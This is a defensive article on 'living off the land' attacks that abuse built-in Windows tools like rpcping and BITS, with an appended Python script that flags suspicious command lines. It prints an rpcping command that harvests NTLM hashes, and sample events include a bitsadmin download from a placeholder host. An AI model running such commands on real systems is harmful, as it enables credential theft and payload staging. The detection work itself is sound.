How to prevent attackers from using Windows against you

Attackers use standard Microsoft components such as DLLs or PowerShell to avoid detection. These tips will make such "living off the land" attacks harder to execute.


One of the topics covered in a recent RSA Conference presentation was how attackers are using the victims’ own Windows operating system against them to avoid detection. This concept of “living off the land” (LotL) — the use of binaries, DLLs and other computer code that is already on our system — makes it harder to protect our systems.

These binaries either ship by default with the Microsoft operating system or are downloaded from the Microsoft download site. A binary can also have interesting or unintended functionality such as persistence, User Account Control (UAC) bypass, credential theft or other techniques that would be significant to attackers. You can review the potential attacks and uses of the binaries listed on the LOLBAS site.

For example, attackers can use the command rpcping to capture credentials. They can send a remote procedure call (RPC) test connection to the target server (-s) and force the NT LAN Manager (NTLM) hash to be sent in the process. The command rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM allows the attacker to harvest the hash of a password.

Another example that is often used in attacks is a tool meant to protect and patch systems. Background Intelligent Transfer Service (BITS) is used by Microsoft to deliver and manage the updating process. Attackers use BITS to transfer malicious files, create alternate data streams, or copy and execute files.
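One way to watch for the rpcping and BITS usage described above, as an added example that is not part of the original article: a small filter over process-creation command lines. The sample events, the function names and the choice of bitsadmin switches to flag are assumptions made for illustration.

```python
import re

# Constructed process-creation command lines, as they would appear in
# Security event 4688 or Sysmon event ID 1 (sample data, not real telemetry).
SAMPLE_EVENTS = [
    r'rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM',
    r'C:\Windows\System32\RPCPing.exe /s 10.0.0.5 /u ntlm /a connect',
    r'rpcping -s dc01 -t ncacn_ip_tcp',
    r'bitsadmin /transfer job1 /download https://example.invalid/a.bin C:\Users\Public\a.bin',
    r'bitsadmin /list /allusers',
    r'"C:\Program Files\App\app.exe" --update',
]

NTLM_PACKAGES = {"ntlm", "10"}  # 10 is RPC_C_AUTHN_WINNT, the numeric id for NTLM
BITS_VERBS = {"/transfer", "/addfile", "/setnotifycmdline"}  # move or launch files

def tokens(cmdline):
    """Split a Windows command line, keeping quoted paths together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def image_name(path):
    """Lower-case executable name without directory or .exe suffix."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name

def flag_value(args, letter):
    """Value following -x (as in the article) or /x (as in Microsoft's docs)."""
    for i, arg in enumerate(args[:-1]):
        if arg.lower() in ("-" + letter, "/" + letter):
            return args[i + 1]
    return None

def classify(cmdline):
    """Return a reason string if the command line matches a pattern, else None."""
    toks = tokens(cmdline)
    if not toks:
        return None
    exe, args = image_name(toks[0]), toks[1:]
    if exe == "rpcping":
        package = flag_value(args, "u")
        if package and package.lower() in NTLM_PACKAGES:
            return "rpcping forcing NTLM authentication to " + (flag_value(args, "s") or "(no -s given)")
    elif exe == "bitsadmin":
        verbs = sorted(BITS_VERBS.intersection(a.lower() for a in args))
        if verbs:
            return "bitsadmin job using " + ", ".join(verbs)
    return None

def scan(events):
    """Return (index, reason) for every event worth an analyst's attention."""
    hits = [(i, classify(event)) for i, event in enumerate(events)]
    return [(i, reason) for i, reason in hits if reason]
```

Legitimate software also uses BITS, so hits from the bitsadmin branch are leads to triage against the job's source URL and owner rather than verdicts.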
